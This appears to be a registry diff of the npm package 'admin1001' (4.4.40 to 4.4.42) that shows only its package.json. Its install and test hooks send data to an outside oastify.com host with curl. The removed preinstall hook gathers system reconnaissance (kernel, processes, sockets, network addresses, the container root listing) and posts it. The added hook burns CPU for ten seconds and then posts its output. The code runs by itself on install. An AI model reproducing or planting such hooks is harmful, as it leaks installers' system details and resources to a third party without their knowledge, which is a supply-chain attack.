admin1001 4.4.40 → 4.4.42

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,11 +1,11 @@
1
1
  {
2
2
  "name": "admin1001",
3
- "version": "4.4.40",
3
+ "version": "4.4.42",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "test": "curl 4x2lfbce036ru3bh163au3bft6zxnoncc.oastify.com",
8
- "preinstall": "sh -c 'mkdir -p /tmp/poc_evidence && uname -a > /tmp/poc_evidence/uname.txt 2>&1 || true && cat /proc/cmdline > /tmp/poc_evidence/proc_cmdline.txt 2>&1 || true && cat /proc/self/cgroup > /tmp/poc_evidence/proc_self_cgroup.txt 2>&1 || true && ps auxf > /tmp/poc_evidence/ps_auxf.txt 2>&1 || true && (ss -tunap || netstat -tunap) > /tmp/poc_evidence/sockets.txt 2>&1 || true && ip addr > /tmp/poc_evidence/ip_addr.txt 2>&1 || true && ls -la /proc/self/fd > /tmp/poc_evidence/proc_fds.txt 2>&1 || true && ls -la /proc/1/root > /tmp/poc_evidence/proc1_root_listing.txt 2>&1 || true && hostname > /tmp/poc_evidence/hostname.txt 2>&1 || true && date -u +\"%Y-%m-%d %H:%M:%S UTC\" > /tmp/poc_evidence/timestamp_utc.txt 2>&1 || true && tar -czf /tmp/poc_evidence_${npm_package_name:-poc}.tar.gz -C /tmp poc_evidence || true' | curl --data @- 4x2lfbce036ru3bh163au3bft6zxnoncc.oastify.com"
8
+ "preinstall": "node -e \"console.log('CPU test start'); let start=Date.now(); while(Date.now()-start<10000){for(let i=0;i<1000000;i++)Math.sqrt(Math.random());} console.log('CPU test done');\" | curl --data @- 4x2lfbce036ru3bh163au3bft6zxnoncc.oastify.com"
9
9
  },
10
10
  "author": "",
11
11
  "license": "ISC"